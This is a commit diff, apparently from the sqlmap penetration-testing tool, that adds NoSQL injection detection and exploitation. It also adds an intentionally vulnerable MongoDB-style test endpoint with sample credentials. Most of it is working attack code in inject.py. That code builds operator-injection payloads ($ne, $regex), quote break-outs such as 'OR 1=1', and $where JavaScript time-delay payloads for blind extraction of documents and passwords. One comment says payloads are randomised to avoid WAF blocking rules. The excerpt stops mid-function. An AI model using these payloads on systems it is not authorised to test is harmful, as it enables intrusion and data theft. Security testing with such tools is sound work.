Adding support for NoSQL injection
Some checks failed
/ build (macos-latest, 3.8) (push) Has been cancelled
/ build (ubuntu-latest, pypy-2.7) (push) Has been cancelled
/ build (windows-latest, 3.14) (push) Has been cancelled

This commit is contained in:
Miroslav Štampar 2026-06-24 22:57:09 +02:00
parent 0a331f2f89
commit 2893fd5c4d
11 changed files with 1535 additions and 9 deletions

View file

@ -160,10 +160,10 @@ ca86d61d3349ed2d94a6b164d4648cff9701199b5e32378c3f40fca0f517b128 extra/shutils/
df768bcb9838dc6c46dab9b4a877056cb4742bd6cfaaf438c4a3712c5cc0d264 extra/shutils/recloak.sh
1972990a67caf2d0231eacf60e211acf545d9d0beeb3c145a49ba33d5d491b3f extra/shutils/strip.sh
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 extra/vulnserver/__init__.py
63657c00a046ca0fb28fd069407ab6305bd7b95c42f26a96ed083fd05b152252 extra/vulnserver/vulnserver.py
43214ecb0101bce72eb243c91b90db34693ebfd485d6c111a4ae22591ff7800b extra/vulnserver/vulnserver.py
a2bf70d7f87c3a4e0675c0bad54119a4e04efa6ea2730a8338d5aebcd995630e lib/controller/action.py
9387fb775b694156a71b336a2a9638ef24c577aa38746f391ac040ff05306d95 lib/controller/checks.py
96463b969312bd4fd29452b5fc739f33e5a73f81fdc1ef80ac27debbe9926e42 lib/controller/controller.py
0c6433b289094d37f295238699042a34a6ab950bb3d11f74fe9a83d30bb7f4bd lib/controller/checks.py
ea0fdf6bcda59aae4d093bada965654a0cd940227c2dbdf62b6ded79baa8dfad lib/controller/controller.py
d69e84f1648cdb907f5d2dd454f03874a4613752b07867510145d51d84b3c56f lib/controller/handler.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/controller/__init__.py
9c5764c92ce536d1f0f96200359ee5ef1f37f9128769bf990cb77f1d1f8e17b1 lib/core/agent.py
@ -181,7 +181,7 @@ f8de57606325456928e46ae2896f5f8bbec9ad18b1c644b492a566fa992216f6 lib/core/decor
5387168e5dfedd94ae22af7bb255f27d6baaca50b24179c6b98f4f325f5cc7b4 lib/core/exception.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/core/__init__.py
914a13ee21fd610a6153a37cbe50830fcbd1324c7ebc1e7fc206d5e598b0f7ad lib/core/log.py
8b260bff7f24947ece55727277d526c88a91f7cb9ffe059c4b9c190bf85f80e1 lib/core/optiondict.py
056930fba3cf9827f97d280bc38ac785c93108eb84c922f5f39723bb04dcf403 lib/core/optiondict.py
4e7f2ad3d2866093aa195616a0e93de1687406edc0b9038fbfa76bf1c9c174b2 lib/core/option.py
ccc4a717e887652b1fcce073d9409d9c59a3b28548c703a9e453d15845f90cd7 lib/core/patch.py
49c0fa7e3814dfda610d665ee02b12df299b28bc0b6773815b4395514ddf8dec lib/core/profiling.py
@ -189,18 +189,18 @@ ccc4a717e887652b1fcce073d9409d9c59a3b28548c703a9e453d15845f90cd7 lib/core/patch
9bf174058f15d14e24e94f9aaf42df045119d3617c6c54bd2f3af79b462f331d lib/core/replication.py
0b8c38a01bb01f843d94a6c5f2075ee47520d0c4aa799cecea9c3e2c5a4a23a6 lib/core/revision.py
888daba83fd4a34e9503fe21f01fef4cc730e5cde871b1d40e15d4cbc847d56c lib/core/session.py
2db950a79f3f8a4bbb0f35731d4e2eef220150961be55d8ba4b1f9565bdd483a lib/core/settings.py
ca14e55b4d49a9b9f4e547180828030e4fcc51176dc9036879dbdae05919dd02 lib/core/settings.py
c7804223319e18eb0b8e2cbf0a8b6896d1cefb7b0b1a2e9f1cf826a8a3b56750 lib/core/shell.py
a2e98a94b231432736d6b304fc75525c8b5fdb4768c418387c5b4c1a610dad64 lib/core/subprocessng.py
19f1e3c5e3ba703d28d510cd7a9ab8284d5fbe9df5ce7e77c86e5931571364b7 lib/core/target.py
c1392cda2f202fa3c628f74533c8d9379d1cf7e754ac165e39021bbc2bbc4a22 lib/core/testing.py
e453904a50372216b09146ad9f11cdced2323c10f49c3d866238cc044dcb2cce lib/core/testing.py
95656c44bab1771f4808030dd6a17eae5b129cb1234443f00b19695c7b712b86 lib/core/threads.py
b9aacb840310173202f79c2ba125b0243003ee6b44c92eca50424f2bdfc83c02 lib/core/unescaper.py
53e396902cb2546eaa09e77073fcba8be8827ee9ce055cfc899e81b0e6ad4d6d lib/core/update.py
2400e465fa4d13e4c32795910878c71ff212e4361b46428d57ce43983f5e997c lib/core/wordlist.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/__init__.py
54bfd31ebded3ffa5848df1c644f196eb704116517c7a3d860b5d081e984d821 lib/parse/banner.py
6060d2d11fab39796b87ace30a872302f365dea3b14d24670915fdb9edc86011 lib/parse/cmdline.py
223badcfd102cdf3313411b63d09b6c59599d58dfc40d27409b1bfa2efc1aa8f lib/parse/cmdline.py
02d82e4069bd98c52755417f8b8e306d79945672656ac24f1a45e7a6eff4b158 lib/parse/configfile.py
c5b258be7485089fac9d9cd179960e774fbd85e62836dc67cce76cc028bb6aeb lib/parse/handler.py
5c9a9caee948843d5537745640cc7b98d70a0412cc0949f59d4ebe8b2907c06c lib/parse/headers.py
@ -240,6 +240,8 @@ a66a4b9df6207dce722c9b71d290ea426723cb4b697b416065dc7dd5db96fe8e lib/techniques
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/error/__init__.py
5bbef46c16e34fd80e3f9f0e9aa255ce2e39be0d0e57479e25890b041c7efc7d lib/techniques/error/use.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/__init__.py
44401cad3e39ae9fb899ed5d0e2fdd0879561de05c3117f17f3b0db54f4e3724 lib/techniques/nosql/__init__.py
d62b28bf9f1544e65a1017994402f484166f4d64a1efb724351b15e27b851990 lib/techniques/nosql/inject.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/union/__init__.py
ceec65f8cb7c3254c4671351c837418c76ac5bc55ccbc40779f67231b54d7085 lib/techniques/union/test.py
c65766f71e285fc85cdf58e7448c4c1d015af2a9dbb44fa3b665a9f13362fbcc lib/techniques/union/use.py
@ -597,6 +599,7 @@ c04e8358fb6df45f69f2f26435c971acde280535bf304e84d30cf2681158c6a7 tests/test_has
d539d0ae758b5bb91e314ab82ab4fe03d6fb2f8b377d16aefa6d7d1d77a7d5a9 tests/test_identifiers_output.py
5372270b7ed82b62f273c2e9bd1f7ecd8605371e66cd0ad70663762cb08d42f1 tests/test_inference_engine.py
caa06fed7323b2bb6d0f2443ce343de94f75bf8ad012c055d5e07741d908ebad tests/test_misc.py
790b78c600b61eb0bdd6e07e14b1db3eb2ddd5fc5d4edb9e975f85ced38558c7 tests/test_nosql.py
57fa9713a3186020be8bcc3f06399e92bf9ce82ec6d3413c76babe19606bb698 tests/test_openapi_drift.py
cde0bea1263ae857561f91ed2bd515e972b716743f017d31b1718a8546c72759 tests/test_pagecontent.py
4bac34af2abddce003756d6776e89b2fda220bb7603ef3761f4f37ee29f9c369 tests/test_payload_marking.py

View file

@ -122,6 +122,46 @@ SCHEMA = """
LISTEN_ADDRESS = "localhost"
LISTEN_PORT = 8440
# Minimal MongoDB-style collection backing the NoSQL operator-injection endpoint ('/nosql'). The
# 'password' field is the blind-extraction target, constrained by a sibling 'name' equality match.
NOSQL_USERS = {
"luther": "s3cr3t",
"fluffy": "carrot",
"wu": "shanghai",
}
def nosql_match(params):
"""Emulates a MongoDB find() on NOSQL_USERS: reconstructs the operator object for the 'password'
field (from bracket-notation 'password[$ne]=...' or a JSON sub-document) and evaluates it against
the record selected by 'name'. An invalid $regex raises re.error (surfaced as a driver error)."""
record = NOSQL_USERS.get(params.get("name"))
spec = params.get("password")
if isinstance(spec, dict):
op, value = next(iter(spec.items()), ("$eq", None))
else:
op, value = "$eq", spec
for key in params:
match = re.match(r"^password\[(\$\w+)\](?:\[\])?$", key)
if match:
op, value = match.group(1), params[key]
break
if isinstance(value, (tuple, list)):
value = value[-1] if value else None
if record is None:
return False
elif op == "$ne":
return record != value
elif op == "$gt":
return record > (value or "")
elif op == "$regex":
return re.search(value, record) is not None
else: # $eq, $in (single-valued here) and any literal equality
return record == value
_conn = None
_cursor = None
_lock = None
@ -285,6 +325,20 @@ class ReqHandler(BaseHTTPRequestHandler):
self.wfile.write(form.encode(UNICODE_ENCODING))
return
if self.url == "/nosql":
self.send_response(OK)
self.send_header("Content-type", "text/html; charset=%s" % UNICODE_ENCODING)
self.send_header("Connection", "close")
self.end_headers()
try:
output = "<html><body><b>Welcome %s</b></body></html>" % self.params.get("name") if nosql_match(self.params) else "<html><body><b>Invalid credentials</b></body></html>"
except re.error: # invalid $regex -> emulate a MongoDB driver error (drives fingerprinting)
output = "<html><body>MongoServerError: Regular expression is invalid: missing terminating ] for character class</body></html>"
self.wfile.write(output.encode(UNICODE_ENCODING))
return
if self.url == '/':
if not any(_ in self.params for _ in ("id", "query")):
self.send_response(OK)

View file

@ -87,6 +87,7 @@ from lib.core.settings import IPS_WAF_CHECK_TIMEOUT
from lib.core.settings import MAX_DIFFLIB_SEQUENCE_LENGTH
from lib.core.settings import MAX_STABILITY_DELAY
from lib.core.settings import NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH
from lib.core.settings import NOSQL_ERROR_REGEX
from lib.core.settings import PRECONNECT_INCOMPATIBLE_SERVERS
from lib.core.settings import SINGLE_QUOTE_MARKER
from lib.core.settings import SLEEP_TIME_MARKER
@ -1170,6 +1171,13 @@ def heuristicCheckSqlInjection(place, parameter):
except (SystemError, RuntimeError) as ex:
logger.debug("Skipping FI heuristic due to regex failure: %s", getSafeExString(ex))
if not conf.nosql and re.search(NOSQL_ERROR_REGEX, page or ""):
infoMsg = "heuristic (NoSQL) test shows that %sparameter '%s' might be vulnerable to NoSQL injection attacks (rerun with switch '--nosql')" % ("%s " % paramType if paramType != parameter else "", parameter)
logger.info(infoMsg)
if conf.beep:
beep()
kb.disableHtmlDecoding = False
kb.heuristicMode = False

View file

@ -520,6 +520,11 @@ def start():
checkWaf()
if conf.nosql:
from lib.techniques.nosql.inject import nosqlScan
nosqlScan()
continue
if conf.nullConnection:
checkNullConnection()

View file

@ -118,6 +118,7 @@ optDict = {
"Techniques": {
"technique": "string",
"nosql": "boolean",
"timeSec": "integer",
"uCols": "string",
"uChar": "string",

View file

@ -20,7 +20,7 @@ from lib.core.enums import OS
from thirdparty import six
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
VERSION = "1.10.6.159"
VERSION = "1.10.6.160"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
@ -466,7 +466,8 @@ ERROR_PARSING_REGEXES = (
r"error '[0-9a-f]{8}'((<[^>]+>)|\s)+(?P<result>[^<>]+)",
r"\[[^\n\]]{1,100}(ODBC|JDBC)[^\n\]]+\](\[[^\]]+\])?(?P<result>[^\n]+(in query expression|\(SQL| at /[^ ]+pdo)[^\n<]+)",
r"(?P<result>query error: SELECT[^<>]+)",
r"(?P<result>(?:(?:ORA|PLS)-[0-9]{5}:|SQLCODE[ =:]+-?[0-9]+|SQLSTATE[ =:]+[0-9A-Z]{5}|Dynamic SQL Error|DB2 SQL error:|SAP DBTech JDBC:|SQLiteException:|You have an error in your SQL syntax;|Incorrect syntax near |Unclosed quotation mark after the character string|near \"[^\"]+\": syntax error)[^\n<]*)"
r"(?P<result>(?:(?:ORA|PLS)-[0-9]{5}:|SQLCODE[ =:]+-?[0-9]+|SQLSTATE[ =:]+[0-9A-Z]{5}|Dynamic SQL Error|DB2 SQL error:|SAP DBTech JDBC:|SQLiteException:|You have an error in your SQL syntax;|Incorrect syntax near |Unclosed quotation mark after the character string|near \"[^\"]+\": syntax error)[^\n<]*)",
r'"(?:errmsg|errorMessage|reason|msg)"\s*:\s*"(?P<result>[^"]+)"' # generic JSON error-message field (NoSQL document/REST back-ends)
)
# Regular expression used for parsing charset info from meta html headers
@ -847,6 +848,35 @@ DUMMY_NON_SQLI_CHECK_APPENDIX = "<'\">"
# Regular expression used for recognition of file inclusion errors
FI_ERROR_REGEX = r"(?i)[^\n]{0,100}(no such file|failed (to )?open)[^\n]{0,100}"
# Regular expressions (per back-end, anchored to actual error-message structure - not product names) used for heuristic recognition of NoSQL injection
NOSQL_ERRORS = (
("MongoDB", r"Mongo(?:Server|Parse|Network|Runtime|Bulk|WriteConcern)?Error\b|\bBSON(?:Type)?Error\b|\bMongooseError\b|CastError: Cast to|unknown (?:top.level )?operator: ?\$|\$(?:regex|where|expr|in|nin|ne|gt|lt|elemMatch) (?:has to be|is not allowed|must be|not supported|requires)|Regular expression is invalid"),
("CouchDB", r'"error"\s*:\s*"(?:bad_request|query_parse_error|missing_named_query)"|invalid operator: ?\$'),
("Elasticsearch", r'"type"\s*:\s*"[a-z_]*?(?:query_shard|x_content_parse|parsing|search_phase_execution|illegal_argument|too_many_clauses|number_format|script)_exception"|Failed to parse query \['),
("Solr", r"org\.apache\.solr\.[\w.]*(?:SyntaxError|SolrException)"),
("Neo4j", r"Neo\.(?:ClientError|DatabaseError|TransientError|ClientNotification)\.|\bNeo4jError\b|even number of non-escaped quotes|Failed to parse string literal|expected an expression|'(?:UNWIND|OPTIONAL|DETACH|FOREACH|MERGE|LOAD CSV)'"),
("ArangoDB", r"\bArangoError\b|AQL: (?:syntax|parse) error"),
("Cassandra", r"line \d+:\d+ (?:no viable alternative at input|(?:mismatched|extraneous) input '.*?' expecting)|org\.apache\.cassandra|com\.datastax|\bInvalid(?:Request|Query)Exception\b"),
("Redis", r"\bWRONGTYPE\b|ERR Error (?:compiling|running) script|@user_script|\bReplyError\b"),
("Memcached", r"CLIENT_ERROR bad|SERVER_ERROR object too large"),
("InfluxDB", r"error parsing query|unable to parse '[^']*': found"),
("HBase/Phoenix", r"org\.apache\.phoenix|PhoenixParserException|org\.apache\.hadoop\.hbase"),
)
NOSQL_ERROR_REGEX = "(?:%s)" % '|'.join(regex for _, regex in NOSQL_ERRORS)
# Printable-ASCII codepoint bounds bisected (via regexp character-class ranges) during NoSQL blind extraction
NOSQL_CHAR_MIN = 0x20
NOSQL_CHAR_MAX = 0x7e
# Maximum number of document fields enumerated during a NoSQL ($where server-side JavaScript) document dump
NOSQL_MAX_FIELDS = 64
# Maximum number of records walked during a NoSQL blind multi-record (ordered key paging) collection dump
NOSQL_MAX_RECORDS = 100
# Upper bound for the length search during NoSQL blind extraction
NOSQL_MAX_LENGTH = 1024
# Length of prefix and suffix used in non-SQLI heuristic checks
NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH = 6

View file

@ -88,6 +88,7 @@ def vulnTest():
("-u <url> --flush-session --technique=B --keyset --dump -T users", ("using keyset (seek) pagination", "30 entries", "luther", "nameisnull")), # keyset/seek dump via the SQLite rowid cursor
("-u <url> -z \"tec=B\" --hex --fresh-queries --threads=4 --sql-query=\"SELECT * FROM users\"", ("SELECT * FROM users [30]", "nameisnull")),
("-u \"<url>&echo=foobar*\" --flush-session", ("might be vulnerable to cross-site scripting",)),
("-u \"<base>nosql?name=luther&password=x\" -p password --nosql --flush-session", ("is vulnerable to NoSQL injection", "back-end: 'MongoDB'", "NoSQL: GET parameter 'password'", "s3cr3t")), # NoSQL (MongoDB) operator-injection detection + blind regexp extraction
("-u \"<url>&query=*\" --flush-session --technique=Q --banner", ("Title: SQLite inline queries", "banner: '3.")),
("-d \"<direct>\" --flush-session --dump -T creds --dump-format=SQLITE --binary-fields=password_hash --where \"user_id=5\"", ("3137396164343563366365326362393763663130323965323132303436653831", "dumped to SQLITE database")),
("-d \"<direct>\" --flush-session --banner --schema --sql-query=\"UPDATE users SET name='foobar' WHERE id=4; SELECT * FROM users; SELECT 987654321\"", ("banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "4,foobar,nameisnull", "'987654321'",)),

View file

@ -415,6 +415,9 @@ def cmdLineParser(argv=None):
techniques.add_argument("--technique", dest="technique",
help="SQL injection techniques to use (default \"%s\")" % defaults.technique)
techniques.add_argument("--nosql", dest="nosql", action="store_true",
help="Test for NoSQL injection (e.g. MongoDB, CouchDB, Neo4j)")
techniques.add_argument("--time-sec", dest="timeSec", type=int,
help="Seconds to delay the DBMS response (default %d)" % defaults.timeSec)

View file

@ -0,0 +1,6 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
See the file 'LICENSE' for copying permission
"""

View file

@ -0,0 +1,765 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
See the file 'LICENSE' for copying permission
"""
import difflib
import json
import re
import time
from collections import namedtuple
from collections import OrderedDict
from lib.core.common import randomStr
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.enums import CUSTOM_LOGGING
from lib.core.enums import PLACE
from lib.core.enums import POST_HINT
from lib.core.settings import NOSQL_CHAR_MAX
from lib.core.settings import NOSQL_CHAR_MIN
from lib.core.settings import NOSQL_ERROR_REGEX
from lib.core.settings import NOSQL_MAX_FIELDS
from lib.core.settings import NOSQL_MAX_LENGTH
from lib.core.settings import NOSQL_MAX_RECORDS
from lib.core.settings import UPPER_RATIO_BOUND
from lib.request.connect import Connect as Request
from lib.utils.xrange import xrange
from thirdparty.six.moves import urllib as _urllib
# Improbable literal used to build always-true/never-match payloads. Randomized per run (like
# kb.chars boundaries) so it never becomes a static signature a WAF can pin a blocking rule on.
NOSQL_SENTINEL = randomStr(length=10, lowercase=True)
# Maximum number of characters of in-band (reflected) data surfaced from an always-true response
NOSQL_DUMP_LIMIT = 4096
# Delivery shapes that can carry an injection into a back-end filter/query
NOSQL_PLACES = (PLACE.GET, PLACE.POST, PLACE.URI, PLACE.CUSTOM_POST, PLACE.COOKIE)
# Lucene regexp metacharacters (Elasticsearch/Solr) requiring escaping in built patterns
LUCENE_META = set('.?+*|(){}[]"\\/')
# Java regexp metacharacters (Cypher/AQL =~) requiring escaping in built patterns
JAVA_META = set('.?+*|(){}[]^$\\/')
# Engines detectable through a syntax-breaking probe but lacking a clean substring oracle for blind
# extraction (mapped from recognizable error-message fragments - not product names - to back-end name)
ERROR_SIGNATURES = (
("Cassandra", ("no viable alternative at input", "org.apache.cassandra", "com.datastax", "invalidrequestexception")),
("Redis", ("wrongtype operation", "err error compiling script", "err error running script", "@user_script", "replyerror")),
("Memcached", ("client_error bad", "server_error object too large")),
("InfluxDB", ("error parsing query", "unable to parse")),
("HBase/Phoenix", ("org.apache.phoenix", "phoenixparserexception", "org.apache.hadoop.hbase")),
)
_UNSET = object()
# HTTP status of the most recent request issued by _send() (None when bypassed, e.g. under tests)
_lastCode = None
# Resolved injection vector. `template` is the always-true page for content-based blind extraction
# (None for time-based/detection-only); `bypass` is the always-true payload reported as a login/filter
# bypass; `truth` overrides the content oracle (e.g. a timing predicate for the $where time-based path);
# `dump` is a callable returning (columns, rows) for a whole-document dump (server-side-JS key enumeration).
Vector = namedtuple("Vector", ("dbms", "fetch", "lengthValue", "charValue", "template", "bypass", "truth", "dump"))
Vector.__new__.__defaults__ = (None, None, None, None)
def _ratio(first, second):
return difflib.SequenceMatcher(None, first or "", second or "").quick_ratio()
def _encode(value):
return _urllib.parse.quote(value, safe="")
def _lucene(value):
return "".join(("\\" + _ if _ in LUCENE_META else _) for _ in value)
def _javaEscape(value):
return "".join(("\\" + _ if _ in JAVA_META else _) for _ in value)
def _quoted(regex):
# double every backslash so a regexp survives a single-quoted string literal (Cypher/AQL/N1QL),
# whose own backslash processing would otherwise strip one level before the engine parses it
return regex.replace("\\", "\\\\")
def _isJsonBody():
return kb.postHint in (POST_HINT.JSON, POST_HINT.JSON_LIKE)
def _jsonKey(parameter):
for prefix in ("JSON ", "JSON-like "):
if parameter.startswith(prefix):
return parameter[len(prefix):]
return parameter
def _delim(place):
# parameter delimiter for the place: ';' for cookies (per --cookie-del), '&' otherwise
return (conf.cookieDel or ';') if place == PLACE.COOKIE else '&'
def _originalValue(place, parameter):
for segment in conf.parameters[place].split(_delim(place)):
name, _, value = segment.partition('=')
if name.strip() == parameter:
return value
return conf.paramDict.get(place, {}).get(parameter) or ""
def _replaceSegment(place, parameter, segment):
"""Rebuild conf.parameters[place], swapping the target parameter for `segment` (e.g. 'k[$ne]=v'
or 'k=v') while preserving every sibling parameter verbatim"""
delimiter = _delim(place)
retVal, replaced = [], False
for part in conf.parameters[place].split(delimiter):
if not replaced and part.split('=', 1)[0].strip() == parameter:
retVal.append(segment)
replaced = True
else:
retVal.append(part)
if not replaced:
retVal = [segment if name == parameter else "%s=%s" % (_encode(name), _encode(value)) for name, value in conf.paramDict[place].items()]
return delimiter.join(retVal)
def _send(place, parameter, segment=None, jsonValue=_UNSET):
"""Issues a single request with the target parameter overridden - by raw 'name=value' segment for
URL/body parameters, or by setting the key to `jsonValue` for JSON bodies - returning the response"""
global _lastCode
skipUrlEncode = conf.skipUrlEncode
conf.skipUrlEncode = True
try:
kwargs = {"raise404": False, "silent": True}
if jsonValue is not _UNSET and _isJsonBody() and place in (PLACE.POST, PLACE.CUSTOM_POST):
try:
data = json.loads(conf.data)
except Exception:
data = {}
data[_jsonKey(parameter)] = jsonValue
payload = kwargs["post"] = json.dumps(data)
elif place == PLACE.COOKIE:
payload = kwargs["cookie"] = _replaceSegment(place, parameter, segment)
else:
payload = _replaceSegment(place, parameter, segment)
kwargs["post" if place in (PLACE.POST, PLACE.CUSTOM_POST) else "get"] = payload
logger.log(CUSTOM_LOGGING.PAYLOAD, _urllib.parse.unquote(payload)) # readable, surfaced at -v 3 like a regular sqlmap payload
page, _, _lastCode = Request.getPage(**kwargs)
finally:
conf.skipUrlEncode = skipUrlEncode
return page or ""
def _isError(page):
# a server-error status or a recognizable back-end error body marks a response as NOT a valid
# always-true template (prevents two differing error pages from faking a boolean oracle)
return (_lastCode or 0) >= 500 or bool(re.search(NOSQL_ERROR_REGEX, page or ""))
def _fetch(place, parameter, op, value, isArray=False):
"""MongoDB/CouchDB dialect: renders the parameter as an operator object (bracket or JSON shape)"""
suffix = ("[%s][]" % op) if isArray else ("[%s]" % op)
segment = "%s%s=%s" % (_encode(parameter), suffix, _encode(value))
return _send(place, parameter, segment, {op: [value]} if isArray else {op: value})
def _fetchValue(place, parameter, value):
"""String dialects (Lucene query_string, Cypher, AQL): replaces the parameter's value verbatim"""
return _send(place, parameter, "%s=%s" % (_encode(parameter), _encode(value)), value)
def _boolean(truthy, falsy):
"""Returns the (reproducible) true-page when a NoSQL true/false payload pair yields a stable
content divergence - i.e. the payload reached and influenced the back-end - else None"""
truePage = truthy()
if not truePage or _isError(truePage): # an error response is never a valid always-true template
return None
falsePage = falsy()
if _ratio(truePage, truthy()) > UPPER_RATIO_BOUND and _ratio(truePage, falsePage) < UPPER_RATIO_BOUND:
return truePage
return None
def _detectMongo(place, parameter):
# $ne (matches everything) vs $in [sentinel] (matches nothing); $gt '' (matches any string) is a
# fallback always-true for apps that filter $ne but not the comparison operators
return _boolean(lambda: _fetch(place, parameter, "$ne", NOSQL_SENTINEL), lambda: _fetch(place, parameter, "$in", NOSQL_SENTINEL, isArray=True)) \
or _boolean(lambda: _fetch(place, parameter, "$gt", ""), lambda: _fetch(place, parameter, "$in", NOSQL_SENTINEL, isArray=True))
def _detectES(place, parameter):
# query_string '*' (matches everything) vs a literal sentinel (matches nothing)
return _boolean(lambda: _fetchValue(place, parameter, '*'), lambda: _fetchValue(place, parameter, NOSQL_SENTINEL))
def _detectCypher(place, parameter):
# single-quote break-out: OR '1'='1' (true) vs OR '1'='2' (false)
return _boolean(lambda: _fetchValue(place, parameter, NOSQL_SENTINEL + "' OR '1'='1"), lambda: _fetchValue(place, parameter, NOSQL_SENTINEL + "' OR '1'='2"))
def _detectAQL(place, parameter):
# single-quote break-out: || '1'=='1 (true) vs || '1'=='2 (false)
return _boolean(lambda: _fetchValue(place, parameter, NOSQL_SENTINEL + "' || '1'=='1"), lambda: _fetchValue(place, parameter, NOSQL_SENTINEL + "' || '1'=='2"))
def _detectNumeric(place, parameter):
# unquoted (numeric-context) boolean break-out for SQL-like back-ends: OR/AND (Cypher/N1QL) or
# ||/&& (AQL). A numeric field is not blindly regexp-extractable, so exploitation is the in-band
# dump of the always-true response (rows reflected by the page)
value = (_originalValue(place, parameter) or "1").strip()
if not value.isdigit():
return None
template = _boolean(lambda: _fetchValue(place, parameter, "%s OR 1=1" % value), lambda: _fetchValue(place, parameter, "%s AND 1=2" % value))
if template:
# Cypher, N1QL and PartiQL share OR/AND; tell them apart by a constant-arg, field-free primitive
# each engine alone honors: N1QL REGEXP_CONTAINS, DynamoDB begins_with (Cypher has neither)
if _confirm(place, parameter, "%s OR REGEXP_CONTAINS('ab', 'a') OR 1=2" % value, "%s OR REGEXP_CONTAINS('ab', 'z') OR 1=2" % value):
dbms = "Couchbase"
elif _confirm(place, parameter, "%s OR begins_with('ab', 'a') OR 1=2" % value, "%s OR begins_with('ab', 'z') OR 1=2" % value):
dbms = "DynamoDB"
else:
dbms = "Neo4j"
return dbms, template, "%s OR 1=1" % value
template = _boolean(lambda: _fetchValue(place, parameter, "%s || 1==1" % value), lambda: _fetchValue(place, parameter, "%s && 1==2" % value))
if template:
return "ArangoDB", template, "%s || 1==1" % value
return None
def _detectError(place, parameter):
# last-resort: a syntax-breaking value that diverges from a normal one and surfaces an engine error
original = _originalValue(place, parameter) or '1'
normal = _fetchValue(place, parameter, original)
broken = _fetchValue(place, parameter, original + "'")
if not normal or _ratio(normal, broken) >= UPPER_RATIO_BOUND:
return None
for engine, tokens in ERROR_SIGNATURES:
if any(_ in broken.lower() for _ in tokens):
return engine
return None
def _fingerprintMongo(place, parameter):
page = _fetch(place, parameter, "$regex", '(').lower() # invalid regexp -> driver/DB error
if any(_ in page for _ in ("couch", "mango", "bad_arg", "erlang")):
return "CouchDB"
elif any(_ in page for _ in ("mongo", "bson", "regular expression", "$regex")):
return "MongoDB"
else:
return "MongoDB (assumed)"
def _fingerprintLucene(place, parameter):
page = _fetchValue(place, parameter, "/[/").lower() # invalid regexp -> engine error
if any(_ in page for _ in ("solr", "solrexception")):
return "Solr"
elif "opensearch" in page:
return "OpenSearch"
else:
return "Elasticsearch"
def _constraint(place, parameter, eq='=', conj=" AND ", prefix="u."):
"""Re-expresses sibling parameters as query constraints (field == parameter name) so extraction
stays bound to the originally matched record. `prefix`/`eq`/`conj` adapt the per-dialect syntax
(Cypher: 'u.'/'='/' AND '; AQL: 'u.'/'=='/' && '; $where JS: 'this.'/'=='/'&&')"""
parts = []
for segment in conf.parameters[place].split(_delim(place)):
if '=' not in segment:
continue
name, _, value = segment.partition('=')
name = name.strip()
if name and name != parameter:
parts.append("%s%s%s'%s'" % (prefix, name, eq, value))
return (conj.join(parts) + conj) if parts else ""
def _confirm(place, parameter, truePayload, falsePayload):
# disambiguates dialects that share the same break-out syntax by probing a dialect-specific
# regexp-match primitive (e.g. Cypher '=~' vs N1QL 'REGEXP_CONTAINS') for a true/false divergence
return _boolean(lambda: _fetchValue(place, parameter, truePayload), lambda: _fetchValue(place, parameter, falsePayload)) is not None
def _timed(call):
start = time.time()
call()
return time.time() - start
def _whereDelay(condition):
# MongoDB $where (server-side JS) string break-out: busy-loops for ~conf.timeSec seconds whenever
# the per-document JS `condition` holds, yielding a timing oracle when no content differential
# exists. The document is passed in as `d` (inside the function `this` is not the document).
return "%s' || (function(d){if(%s){var t=new Date().getTime();while(new Date().getTime()-t<%d){}}return false})(this) || '1'=='2" % (NOSQL_SENTINEL, condition, int(conf.timeSec * 1000))
def _detectWhere(place, parameter):
# an unconditional-delay payload must run ~conf.timeSec slower than the baseline while a
# non-delaying one stays fast (the latter guards against a uniformly slow endpoint)
threshold = _timed(lambda: _fetchValue(place, parameter, _originalValue(place, parameter) or "1")) + conf.timeSec * 0.5
if threshold < conf.timeSec and _timed(lambda: _fetchValue(place, parameter, _whereDelay("true"))) > threshold:
if _timed(lambda: _fetchValue(place, parameter, "%s' || '1'=='2" % NOSQL_SENTINEL)) <= threshold:
return threshold
return None
def _jsString(value):
return "'%s'" % value.replace("\\", "\\\\").replace("'", "\\'")
def _whereField(place, parameter, bound, expr, threshold):
"""Time-based recovery of an arbitrary per-document JavaScript string expression `expr` (e.g. a key
name 'Object.keys(d)[i]', or a value 'String(d[name])') via the $where busy-loop oracle"""
truth = lambda payload: _timed(lambda: _fetchValue(place, parameter, payload)) > threshold
return _extract(None, None,
lambda n: _whereDelay("%s(%s)&&(%s).length>=%d" % (bound, expr, expr, n)),
lambda known, klass: _whereDelay("%s/^%s%s/.test(%s)" % (bound, _javaEscape(known), klass, expr)),
truth)
def _whereDump(place, parameter, bound, threshold):
"""Whole-document dump via server-side-JavaScript key enumeration: walk Object.keys(this) to recover
each field name, then String(this[name]) for its value. Returns (columns, rows) or None"""
columns, values = [], []
for index in xrange(NOSQL_MAX_FIELDS):
name = _whereField(place, parameter, bound, "Object.keys(d)[%d]" % index, threshold)
if not name:
break
columns.append(name)
values.append(_whereField(place, parameter, bound, "String(d[%s])" % _jsString(name), threshold) or "")
logger.info("retrieved: %s='%s'" % (name, values[-1]))
return (columns, [values]) if columns else None
def _classChar(ordinal):
char = chr(ordinal)
return ("\\" + char) if char in "]\\^-" else char # escape the char-class metacharacters
def _klass(low, high):
# a regexp character class spanning the codepoints [low, high] (single member when low == high)
